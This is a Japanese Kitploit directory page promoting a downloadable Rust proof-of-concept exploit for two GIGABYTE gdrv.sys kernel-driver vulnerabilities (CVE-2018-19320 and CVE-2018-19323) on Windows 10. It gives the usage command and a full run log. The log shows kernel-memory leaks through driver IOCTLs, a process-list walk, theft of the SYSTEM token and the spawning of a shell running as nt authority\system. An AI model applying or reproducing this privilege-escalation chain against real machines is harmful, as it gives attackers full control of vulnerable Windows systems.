Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-1932X — CVE-2018-1932X カーネルドライバ脆弱性向けの Rust PoC | Kitploit
ツール/GitHubGitHub/bkreisel/cve-2018-1932x
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペイロード開発バイナリエクスプロイト
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

CVE-2018-1932X カーネルドライバ脆弱性向けの Rust PoC

リポジトリを見る
314年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-1932X(Rust Exploit POC)GIGABYTE APP Center v1.05.21 以前向け

ターゲットがメモリ安全でないからといって、エクスプロイトもそうでなければならないわけではありません!

使用された脆弱性 :

  • CVE-2018-19320 - ring0 memcpy 類似機能
  • CVE-2018-19323 - マシン固有レジスタ(MSR)の読み書き。

テスト環境:

  • 20H1: Windows 10 Kernel Version 19041 MP (1 procs) Free x64

参考

  • Vergilius Project: カーネル構造体
  • Gigabyte パッチアナウンス
  • _KPCR 詳細

必要条件

  • x64 のみ
  • 上記のテスト済みビルド番号
  • ロードされた GIGABYTE ドライバー: gdrv.sys

使用方法

.\CVE-2018-1932X.exe

例

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
  [+] Leaked   _KPCR: ffffe48159d88000
  [*] Address  _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPRCB: ffffe48159d88180
  [*] Address  _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KTHREAD: ffffb50b14d16080
  [*] Address  _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPROCESS: ffffb50b1507f080
  [*] Address  PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   PID: 2092
  [+] Known    PID: 2092
Walking Active Process Links...
  [*] Address  ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: fffff8015561e060 (PID: 0)
  [*] Address  ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708cac8306e
  [+] System  Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708c567b047
Spawning Process...
  [+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO

起動された PowerShell:

root@kitploit:~
PS C:\> whoami
nt authority\system

脆弱なブロック

Memcpy (IOCTL 0x0C3502808)

Memcpy Code Blocks

MSR Manipulation (IOCTL 0x0C3502580)

MSR Code Blocks

ツールをダウンロード